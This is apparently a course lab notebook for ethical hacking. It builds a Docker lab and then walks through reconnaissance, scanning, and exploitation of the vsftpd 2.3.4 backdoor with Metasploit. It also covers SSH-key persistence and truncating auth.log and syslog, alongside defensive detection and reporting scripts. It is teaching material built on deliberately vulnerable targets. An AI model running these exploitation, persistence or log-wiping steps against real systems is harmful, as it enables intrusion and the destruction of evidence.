<a href="https://colab.research.google.com/github/blacktalenthubs/Dynamic-Application-Security-Testing/blob/main/week2_lab_security_engineering.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### Detailed Lab Setup for Ethical Hacking with Command Descriptions (Week 2)

#### 1. Prerequisites

- Ensure Docker is installed on your machine. You can download Docker from [Docker's official website](https://www.docker.com/products/docker-desktop).
- Basic understanding of Docker commands and container management.
- Note that on Docker Desktop (macOS and Windows) the host cannot route packets to the lab's bridge network directly; that is why every scan and exploit below is run from inside the Kali container with `docker exec`, and why the web targets are published to the host with `-p`.

---

#### 2. Setting Up the Environment

**2.1. Create a Docker Network:**
Create a user-defined bridge network for the lab containers.
```bash
docker network create ethical-hacking-lab
```
*Why?* A user-defined bridge keeps the lab containers off Docker's default bridge and gives them name resolution through Docker's embedded DNS, so the Kali container can reach each target by container name (for example `metasploitable2`) as well as by IP address. It is not a security boundary on its own: the vulnerable containers can still reach the internet through the host, and any port published with `-p` later is reachable from the host's network, so run the lab on a machine that is not exposed to untrusted networks. Docker picks the subnet when the network is created; `docker network inspect ethical-hacking-lab` shows the range it chose and the address of every attached container.

---

#### 3. Setting Up the Kali Linux Container

**3.1. Pull the Kali Linux Docker Image:**
```bash
docker pull kalilinux/kali-rolling
```
*Why?* This pulls the latest Kali Linux image, a popular Linux distribution used for penetration testing.

**3.2. Run the Kali Linux Container:**
```bash
docker run -d -it --name kali --network ethical-hacking-lab --cap-add=NET_RAW --cap-add=NET_ADMIN kalilinux/kali-rolling /bin/bash
```
*Why?* This starts the Kali container in detached mode, names it "kali," and attaches it to the lab network; `-it` keeps `/bin/bash` alive so the container does not exit immediately. Nmap's ARP and SYN scans need raw sockets, which the `NET_RAW` and `NET_ADMIN` capabilities provide. `--privileged` would also work, but it hands the container almost every host capability and all host devices, far more than the lab needs, so grant the two capabilities explicitly instead.

**3.3. Install Necessary Tools in the Kali Container:**
```bash
docker exec -it kali bash -c "apt update && apt install -y nmap recon-ng nikto metasploit-framework"
```
*Why?* The `kali-rolling` image ships almost no tools, so this refreshes the package lists and installs Nmap, Recon-ng, Nikto and the Metasploit Framework inside the running container (Metasploit alone is several hundred megabytes, so expect the install to take a while). The tools live in the container's writable layer: they survive `docker stop`/`docker start` but not `docker rm`, so repeat this step if you recreate the container.

---

#### 4. Setting Up Vulnerable Hosts

**4.1. Metasploitable2:**

*Pull and Run Metasploitable2 Container:*
```bash
docker pull tleemcjr/metasploitable2
docker run -d -it --name metasploitable2 --network ethical-hacking-lab tleemcjr/metasploitable2 sh -c "/bin/services.sh && bash"
```
*Why?* Metasploitable2 is a deliberately vulnerable Ubuntu 8.04 system (vsftpd 2.3.4, Samba, Tomcat, a weak MySQL and more) built for practising exploitation. In this image the network services are started by `/bin/services.sh`; without that command the container comes up with nothing listening and later scans find no open ports. Do not publish any of its ports with `-p`: it should be reachable only from the Kali container on the lab network.

**4.2. Juice Shop:**

*Pull and Run OWASP Juice Shop Container:*
```bash
docker pull bkimminich/juice-shop
docker run -d --name juiceshop --network ethical-hacking-lab -p 3000:3000 bkimminich/juice-shop
```
*Why?* Juice Shop is a deliberately vulnerable modern single-page web application (Node.js/Express with an Angular front end) covering the OWASP Top 10. `-p 3000:3000` publishes it on the host so you can work through it in a browser at http://localhost:3000; from the Kali container it is reachable as `http://juiceshop:3000`.

**4.3. WebGoat:**

*Pull and Run WebGoat Container:*
```bash
docker pull webgoat/webgoat-8.0
docker run -d --name webgoat --network ethical-hacking-lab -p 8080:8080 webgoat/webgoat-8.0
```
*Why?* WebGoat is a deliberately insecure Java web application with guided lessons on individual flaw classes. WebGoat 8 is served under the `/WebGoat` context path, so open http://localhost:8080/WebGoat on the host (or `http://webgoat:8080/WebGoat` from Kali), register a user, and work through the lessons.

---

#### 5. Lab Exercises for Ethical Hacking Phases

**5.1. Reconnaissance:**

*Use Case 1: Network Discovery with Nmap*
- **Command:**
```bash
docker exec -it kali nmap -sn <lab-subnet>
```
- **Example:**
```bash
docker exec -it kali nmap -sn 172.18.0.0/16
```
*Why?* `-sn` (the older spelling `-sP` still works but is deprecated) performs host discovery without a port scan, the first step in identifying targets. Because Kali shares a bridge with the targets and runs as root, Nmap uses ARP requests here, so every live container answers even if it ignores ICMP. The `172.18.0.0/16` range is only a typical value: Docker assigns the subnet when the network is created, so read the real one from `docker network inspect ethical-hacking-lab` rather than guessing. Expect the gateway at `.1` and the Kali container itself to show up in the results alongside the targets.
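
The `172.18.0.0/16` range in the example is whatever Docker happened to assign. The script below is an added example for this guide, not part of the course material: it reads the real subnet and each container's address from `docker network inspect` and builds Nmap commands aimed only at the target containers instead of sweeping the whole /16. The JSON sample is constructed to mirror the shape of the real `inspect` output; container IDs, addresses and all function names are the example's own.

```python
"""Derive Nmap targets from `docker network inspect` instead of guessing a subnet.

Added example for this lab guide; not part of the course material. Run it on
the Docker host: it prints the lab subnet, each container's address and the
Nmap commands to paste into the Kali container.
"""
import ipaddress
import json
import subprocess

# Constructed sample of `docker network inspect ethical-hacking-lab` output,
# reduced to the keys this script reads (the real output has many more).
# Container IDs and addresses are made up for the example.
SAMPLE_INSPECT = json.dumps([{
    "Name": "ethical-hacking-lab",
    "IPAM": {"Config": [{"Subnet": "172.18.0.0/16", "Gateway": "172.18.0.1"}]},
    "Containers": {
        "a1b2c3": {"Name": "kali", "IPv4Address": "172.18.0.2/16"},
        "d4e5f6": {"Name": "metasploitable2", "IPv4Address": "172.18.0.3/16"},
        "a7b8c9": {"Name": "juiceshop", "IPv4Address": "172.18.0.4/16"},
        "d0e1f2": {"Name": "webgoat", "IPv4Address": "172.18.0.5/16"},
    },
}])


def parse_network(inspect_output):
    """Return (subnet, {container_name: IPv4Address}) from inspect JSON."""
    net = json.loads(inspect_output)[0]
    subnet = ipaddress.ip_network(net["IPAM"]["Config"][0]["Subnet"])
    hosts = {}
    for container in net.get("Containers", {}).values():
        # IPv4Address carries a prefix length ("172.18.0.3/16"); keep only the host part.
        addr = ipaddress.ip_interface(container["IPv4Address"]).ip
        if addr not in subnet:  # sanity check: inspect output should never disagree with itself
            raise ValueError(f"{container['Name']} has {addr}, outside {subnet}")
        hosts[container["Name"]] = addr
    return subnet, hosts


def scan_commands(hosts, scanner="kali"):
    """Build host-discovery and version-scan commands that target only the
    other lab containers, rather than sweeping a whole /16 for a handful of hosts.
    `docker exec` needs no -it here because nmap is not interactive."""
    targets = " ".join(str(ip) for name, ip in sorted(hosts.items(), key=lambda kv: kv[1])
                       if name != scanner)
    return [
        f"docker exec {scanner} nmap -sn {targets}",
        f"docker exec {scanner} nmap -sV {targets}",
    ]


def live_inspect(network="ethical-hacking-lab"):
    """Ask the local Docker daemon for the real network description."""
    result = subprocess.run(["docker", "network", "inspect", network],
                            check=True, capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    subnet, hosts = parse_network(live_inspect())
    print(f"lab subnet: {subnet}")
    for name, ip in sorted(hosts.items(), key=lambda kv: kv[1]):
        print(f"  {ip!s:16} {name}")
    print("\n".join(scan_commands(hosts)))
```

Running the script on the host needs a working `docker` CLI; the parsing and command-building functions themselves are pure and can be exercised against `SAMPLE_INSPECT` without Docker. Targeting the listed addresses directly also keeps the scan honest about what is in scope: anything not on that list is not a lab target.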

*Use Case 2: Service and Version Detection with Nmap*
- **Command:**
```bash
docker exec -it kali nmap -sV <target-ip-or-container-name>
```
- **Example:**
```bash
docker exec -it kali nmap -sV metasploitable2
```
*Why?* `-sV` probes each open port to identify the service and its version, which is what you later match against known vulnerabilities (for example vsftpd 2.3.4 on port 21 of Metasploitable2). Docker's embedded DNS resolves the container name, which avoids hard-coding an address that can change between runs; `172.18.0.2` in particular is usually the Kali container itself, since it was started first.

*Use Case 3: Web Reconnaissance with Recon-ng*
- **Steps:**
  - Launch Recon-ng:
```bash
docker exec -it kali recon-ng
```
*Why?* This starts Recon-ng, a modular framework for open-source reconnaissance. Unlike the lab targets, Recon-ng works against real, internet-facing domains, so use it only on a domain you own or are authorised to assess, and note that both the marketplace and the modules need outbound internet access from the container.
  - Create a workspace:
```bash
workspaces create example
```
*Why?* Workspaces keep the data for each engagement in its own database. Recon-ng 5, the version Kali ships, uses `workspaces create`; the older `workspaces add` syntax no longer exists.
  - Seed the target domain:
```bash
db insert domains
```
*Why?* Recon-ng modules take their input from the database tables (a module's `SOURCE` option defaults to the matching table), so there is no `set domain` option to set. This command prompts for the domain (enter `example.com`) and stores it in the `domains` table.
  - Install and run a recon module:
```bash
marketplace install recon/domains-hosts/bing_domain_web
modules load recon/domains-hosts/bing_domain_web
run
```
*Why?* Modules are not bundled with Recon-ng 5 and must be installed from the marketplace first (`modules load` replaces the older `use`). `bing_domain_web` searches Bing for hosts under each domain in the `domains` table and stores what it finds in the `hosts` table; inspect the results with `show hosts`.

**5.2. Scanning:**

*Use Case 1: Vulnerability Scanning with Nikto*
- **Command:**
```bash
docker exec -it kali nikto -h http://<target-host>:<port>
```
- **Example:**
```bash
docker exec -it kali nikto -h http://juiceshop:3000
```
*Why?* Nikto (`-h` takes the host or URL) checks a web server for dangerous files, outdated server software and common misconfigurations. It is loud (thousands of requests that stand out in any access log) and its signature database is aimed at classic CGI-era servers, so against a single-page application like Juice Shop expect mostly header and cookie findings; `http://webgoat:8080/WebGoat` and Metasploitable2's Apache on port 80 give it more to work with. Using container names instead of guessed IPs keeps the command valid if Docker assigns different addresses next time.

*Use Case 2: Vulnerability Scanning with Nmap Scripts*
- **Command:**
```bash
docker exec -it kali nmap -sV --script=vuln <target>
```
- **Example:**
```bash
docker exec -it kali nmap -sV --script=vuln metasploitable2
```
*Why?* `--script=vuln` runs the Nmap Scripting Engine's vulnerability-check category against each service identified by `-sV`, turning a version list into concrete findings (for example, `ftp-vsftpd-backdoor` tests for the vsftpd 2.3.4 backdoor). Some scripts in this category are intrusive and can crash fragile services, which is acceptable in the lab but needs explicit agreement on a real engagement.

**5.3. Gaining Access:**

*Use Case 1: Exploiting a Vulnerability with Metasploit*
- **Steps:**
  - Launch Metasploit:
```bash
docker exec -it kali msfconsole
```
*Why?* This starts the Metasploit Framework console, where exploits are found, configured and run against the services discovered earlier. The first start takes a while because Metasploit builds its module cache.
  - Search for an exploit:
```bash
search vsftpd
```
*Why?* The `-sV` scan reported vsftpd 2.3.4 on Metasploitable2's port 21; this lists every module whose name or description mentions vsftpd.
  - Use the exploit:
```bash
use exploit/unix/ftp/vsftpd_234_backdoor
```
*Why?* A compromised copy of the vsftpd 2.3.4 source distributed in 2011 contained a backdoor: logging in with a username that contains `:)` opens a root shell on TCP port 6200. This module triggers it and connects to that shell.
  - Set the target:
```bash
set RHOSTS metasploitable2
```
*Why?* `RHOSTS` is the target option; it accepts a hostname or an IP, and Docker's DNS resolves the container name. `show options` lists the remaining settings and confirms what is set.
  - Run the exploit:
```bash
run
```
*Why?* This triggers the backdoor and, on success, opens a session that is a plain root command shell rather than a Meterpreter session. `sessions -l` lists it and `sessions -i <id>` drops into it; the session ID is what the next phase needs.

**5.4. Maintaining Access:**

*Use Case 1: Creating a Persistent Backdoor*
- **Steps:**
  - Background the shell you obtained (type `background` in the session, or press Ctrl-Z and confirm), note its ID from `sessions -l`, and run the post-exploitation module:
```bash
use post/linux/manage/sshkey_persistence
set SESSION <session-id>
run
```
*Why?* The vsftpd backdoor shell lasts only as long as its connection, so an attacker establishes a second way in. This module adds an SSH public key to `authorized_keys` on the target (Metasploitable2 runs OpenSSH on port 22) and stores the matching private key in Metasploit's loot directory, giving ordinary `ssh -i` access that survives a reboot. On a real engagement any persistence mechanism must be agreed in the rules of engagement, recorded in the report and removed at the end.

**5.5. Covering Tracks:**

*Use Case 1: Clearing Logs*
- **Steps:**
  - Truncate logs on the compromised system (run inside the root shell obtained on the target):
```bash
: > /var/log/auth.log
: > /var/log/syslog
```
*Why?* `auth.log` records the logins and `syslog` the service activity the attack generated; truncating them removes that evidence from the box. `: > file` empties the file in place, so syslogd keeps writing to its open handle; the `echo '' > file` form leaves a lone blank line, which is itself an obvious artifact. Two caveats to take from this step: it only works because the shell is root, and it does nothing against entries already forwarded to a remote collector (for example an rsyslog `*.* @@collector:514` rule), which is exactly why centralised logging is the standard defence. On an authorised engagement you do not destroy client logs; you document what you did so the blue team can validate their detections.
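
Seen from the defender's side, the truncation above is easy to spot if anyone looks. The script below is an added example for this guide, not part of the course material: it reads syslog-style lines like those in `/var/log/auth.log` and flags an empty file, timestamps that run backwards, and gaps longer than the host's normal quiet period. The log excerpts, hostname, PIDs and the two-hour gap threshold are constructed assumptions of the example.

```python
"""Flag the log tampering shown above from the defender's side.

Added example for this lab guide; not part of the course material. Reads
syslog-style lines (the format of /var/log/auth.log and /var/log/syslog on
Metasploitable2) and reports an empty file, entries whose timestamps run
backwards, and gaps longer than expected. Hostnames, PIDs and the log excerpts
below are constructed for the example.
"""
from datetime import datetime, timedelta

# An intact excerpt: cron writes a PAM session line every hour, so an hour is
# the longest quiet period we expect from this host.
INTACT = """\
Mar 10 09:17:01 metasploitable CRON[4100]: pam_unix(cron:session): session opened for user root by (uid=0)
Mar 10 09:42:13 metasploitable sshd[4211]: Accepted password for msfadmin from 172.18.0.2 port 51022 ssh2
Mar 10 10:17:01 metasploitable CRON[4302]: pam_unix(cron:session): session opened for user root by (uid=0)
Mar 10 11:17:01 metasploitable CRON[4455]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# What `echo '' > /var/log/auth.log` leaves behind: a single empty line.
TRUNCATED = "\n"

# A selective edit: the entries between 09:17 and 13:17 were removed and the
# 11:17 line was pasted back out of order.
EDITED = """\
Mar 10 09:17:01 metasploitable CRON[4100]: pam_unix(cron:session): session opened for user root by (uid=0)
Mar 10 13:17:01 metasploitable CRON[4700]: pam_unix(cron:session): session opened for user root by (uid=0)
Mar 10 11:17:01 metasploitable CRON[4455]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

SYSLOG_TS = "%b %d %H:%M:%S"  # classic syslog timestamp: no year, day may be space-padded


def parse_timestamp(line):
    """Parse the leading 15-character syslog timestamp of a log line."""
    return datetime.strptime(line[:15], SYSLOG_TS)


def audit_log(text, max_gap=timedelta(hours=2)):
    """Return a list of anomaly descriptions; an empty list means nothing was flagged.

    max_gap is the longest silence considered normal for the host (assumed:
    two hours, i.e. at most one missed hourly cron entry)."""
    findings = []
    lines = [line for line in text.splitlines() if line.strip()]
    if not lines:
        findings.append("empty: file contains no entries (truncated?)")
        return findings
    prev = None
    for number, line in enumerate(lines, 1):
        try:
            ts = parse_timestamp(line)
        except ValueError:
            findings.append(f"line {number}: unparseable timestamp")
            continue
        if prev is not None:
            # Syslog timestamps carry no year, so a December-to-January rollover
            # would also trip this check; a production tool would add the year.
            if ts < prev:
                findings.append(f"line {number}: timestamp {ts:%b %d %H:%M:%S} is earlier than the previous entry (edited?)")
            elif ts - prev > max_gap:
                findings.append(f"line {number}: {ts - prev} gap since the previous entry")
        prev = ts
    return findings


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = EDITED
    for finding in audit_log(text) or ["no anomalies found"]:
        print(finding)
```

Point it at a copy of the target's log (`docker cp metasploitable2:/var/log/auth.log .` then `python3 audit_log.py auth.log`) before and after the truncation step to see the difference. The gap heuristic depends on knowing the host's baseline chatter, which is why a real detection pipeline compares the file against the copy already shipped to the collector rather than reasoning about the local file alone.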

---

#### 6. Documentation and Reporting

**6.1. Document Findings:**
- Create detailed reports including:
  - **Scope and timeline:** Which hosts were in scope and when each phase ran, so log entries can be matched to your activity.
  - **Scanned IP addresses:** List of discovered IPs.
  - **Open ports and services:** Identified open ports and running services (keep the raw Nmap output, saved with `-oX` or `-oN`, as an appendix).
  - **Identified vulnerabilities:** Detailed description of each vulnerability, the exact command that demonstrated it, and its impact.
  - **Screenshots:** Visual proof of findings.
  - **Suggested mitigations:** Recommended actions to fix vulnerabilities.
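
For the open-ports section it is easier to parse Nmap's XML output than to retype the terminal listing. The script below is an added example for this guide, not part of the course material: it reads a `nmap -sV -oX` file and emits a Markdown table ready to paste into the report. The XML excerpt is constructed to match the shape of Nmap's real output for Metasploitable2, and the function names are the example's own.

```python
"""Turn `nmap -oX` output into the open-port table the report needs.

Added example for this lab guide; not part of the course material. Usage:
    docker exec kali nmap -sV -oX - metasploitable2 > scan.xml
    python3 nmap_report.py scan.xml
The XML excerpt below is constructed to match the shape of Nmap's real output
for Metasploitable2 and is used when no file is given.
"""
import sys
import xml.etree.ElementTree as ET

SAMPLE_XML = """\
<nmaprun scanner="nmap" args="nmap -sV -oX - metasploitable2" start="1710064800">
  <host>
    <status state="up"/>
    <address addr="172.18.0.3" addrtype="ipv4"/>
    <hostnames><hostname name="metasploitable2" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.2.8"/></port>
      <port protocol="tcp" portid="6200"><state state="closed"/><service name="lm-x"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per open port on each host that was up."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down or filtered hosts carry no port data worth reporting
        address = host.find("address[@addrtype='ipv4']")
        if address is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are noise in a findings table
            service = port.find("service")
            attrs = service.attrib if service is not None else {}
            findings.append({
                "host": address.get("addr"),
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": attrs.get("name", ""),
                "product": attrs.get("product", ""),
                "version": attrs.get("version", ""),
            })
    return findings


def to_markdown(findings):
    """Render findings as a Markdown table, sorted by host then port."""
    header = "| Host | Port | Service | Product | Version |\n|---|---|---|---|---|"
    rows = [
        f"| {f['host']} | {f['port']}/{f['proto']} | {f['service']} | {f['product']} | {f['version']} |"
        for f in sorted(findings, key=lambda f: (f["host"], f["port"]))
    ]
    return "\n".join([header, *rows])


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            xml_text = fh.read()
    else:
        xml_text = SAMPLE_XML
    print(to_markdown(parse_nmap_xml(xml_text)))
```

Keeping the XML file itself as an appendix means a reader can regenerate the table and check it against the raw scan; the closed port 6200 in the sample (the vsftpd backdoor port before it is triggered) is deliberately dropped, since closed ports belong in the raw data, not in the findings.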

**6.2. Tools for Documentation:**
- **Dradis:** Collaborative reporting platform that imports Nmap, Nikto and Metasploit output.
- **Markdown files:** Simple text documentation that version-controls well alongside the raw scan output.
- **PDF reports:** Formal deliverable format.

---

### Resources for Students

- **Kali Linux Documentation:** [Kali Linux Docs](https://www.kali.org/docs/)
- **Nmap Documentation:** [Nmap Reference Guide](https://nmap.org/book/man.html)
- **Recon-ng Documentation:** [Recon-ng GitHub](https://github.com/lanmaster53/recon-ng)
- **Nikto User Guide:** [Nikto User Guide](https://cirt.net/Nikto2)
- **Metasploit Documentation:** [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/)

This setup provides a comprehensive lab environment for practicing all phases of ethical hacking, ensuring students gain hands-on experience with various tools and techniques.